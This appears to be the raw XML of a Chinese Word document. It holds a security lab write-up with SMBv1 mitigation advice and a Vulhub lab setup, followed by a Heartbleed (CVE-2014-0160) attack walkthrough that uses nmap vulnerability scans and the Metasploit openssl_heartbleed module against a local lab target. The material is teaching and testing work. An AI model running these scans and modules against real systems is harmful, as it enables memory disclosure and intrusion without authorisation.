        <w:t>：由于该漏洞是通过SMBv1服务进行攻击的，因此关闭该服务可以有效减少被攻击的风险。在Windows系统中，可以通过控制面板或命令行工具来禁用SMBv1服务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E3B53E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>防火墙设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>：使用防火墙来阻止外部访问445端口，可以进一步降低被攻击的风险。配置防火墙规则，禁止外部对445端口的访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57682898">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>安全软件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>：安装专业的安全软件，如防病毒软件和入侵检测系统，可以帮助检测和防御潜在的攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AD8AC4">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="15"/>
    <w:bookmarkEnd w:id="18"/>
    <w:p w14:paraId="4DF3DD0D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="vulnhub靶场搭建"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>vulnhub靶场搭建</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E55A8C">
      <w:pPr>
        <w:pStyle w:val="23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>环境安装</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B515B7">
      <w:pPr>
        <w:pStyle w:val="3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>安装docker，docker-compose，不详细说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33425B47">
      <w:pPr>
        <w:pStyle w:val="3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>安装Vulhub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4D2EFA">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="69"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> clone https://github.com/vulhub/vulhub.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2AF3B7">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="试用vulnhub"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>试用vulnhub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E5B08E">
      <w:pPr>
        <w:pStyle w:val="23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>本次在CentOS上搭建</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E240323">
      <w:pPr>
        <w:pStyle w:val="3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>ip地址为192.168.132.128/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5367F0CC">
      <w:pPr>
        <w:pStyle w:val="3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>尝试用vulnhub搭建一个openssl靶场</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606D0CE4">
      <w:pPr>
        <w:pStyle w:val="3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>在命令行输入下列命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF9933E">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> /vulhub/vulhub/openssl/CVE-2014-0160 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>#找到漏洞目录
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="69"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> systemctl stop firewalld </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>#关闭防火墙
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="74"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> start docker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>#启动docker
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="74"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>docker-compose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> up </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="76"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>-d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>#启动容器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6140971A">
      <w:pPr>
        <w:pStyle w:val="23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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="3415030"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="111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Picture" title="fig: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34155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3FC41C0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B94B11C">
      <w:pPr>
        <w:pStyle w:val="3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>使用kali攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F166C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr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 xml:space="preserve">nmap -O 192.168.132.128 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>扫描靶机开放端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F612DE4">
      <w:pPr>
        <w:pStyle w:val="23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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4917440" cy="3872230"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="114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" title="fig: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917781" cy="3872752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2BC5E3C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr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>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap -sV -sT --script=vuln -p 8443 192.168.132.128 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>进行漏洞扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0FE0EA">
      <w:pPr>
        <w:pStyle w:val="23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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2594610"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="117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Picture" title="fig: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594918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5D2072C">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr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>使用metasploit进行攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C718541">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="74"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>msfconsle
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="74"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> heartbleed
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="74"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> auxiliary/scanner/ssl/openssl_heartbleed
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> rhosts 192.168.132.128
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> rport 8443
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> verbose true
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="74"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45808785">
      <w:pPr>
        <w:pStyle w:val="23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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="4809490"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="120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Picture" title="fig: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4809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54E8F52">
      <w:pPr>
        <w:pStyle w:val="3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>攻击成功!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15751D4E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:bookmarkEnd w:id="19"/>
    <w:bookmarkEnd w:id="20"/>
    <w:sectPr>
      <w:cols w:space="720" w:num="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Aptos">
    <w:altName w:val="宋体"/>
    <w:panose1 w:val="020B0004020202020204"/>
    <w:charset w:val="86"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Aptos">
    <w:altName w:val="AMGD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Aptos Display">
    <w:altName w:val="Segoe Print"/>
    <w:panose1 w:val="020B0004020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="等线 Light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Symbol">
    <w:panose1 w:val="05050102010706020507"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="8000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  <w:font w:name="AMGDT">
    <w:panose1 w:val="02000400000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="80000003" w:usb1="10000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001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华文新魏">
    <w:panose1 w:val="02010800040101010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000001" w:usb1="080F0000" w:usb2="00000000" w:usb3="00000000" w:csb0="00040000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="幼圆">
    <w:panose1 w:val="02010509060101010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000001" w:usb1="080E0000" w:usb2="00000000" w:usb3="00000000" w:csb0="00040000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="楷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阿里巴巴普惠体 2.0 95 ExtraBold">
    <w:panose1 w:val="00020600040101010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="A00002FF" w:usb1="7ACF7CFB" w:usb2="0000001E" w:usb3="00000000" w:csb0="0004009F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="隶书">
    <w:panose1 w:val="02010509060101010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000001" w:usb1="080E0000" w:usb2="00000000" w:usb3="00000000" w:csb0="00040000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="方正舒体">
    <w:panose1 w:val="02010601030101010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000003" w:usb1="080E0000" w:usb2="00000000" w:usb3="00000000" w:csb0="00040000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/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="1">
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"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0000A990"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0000A990"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tentative="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tentative="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tentative="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tentative="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tentative="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tentative="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="0000A991"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0000A991"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="0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entative="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tentative="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tentative="0">
      <w:start w:val="0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entative="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tentative="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tentative="0">
      <w:start w:val="0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entative="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="00A99411"/>
    <w:multiLevelType w:val="multilevel"/>
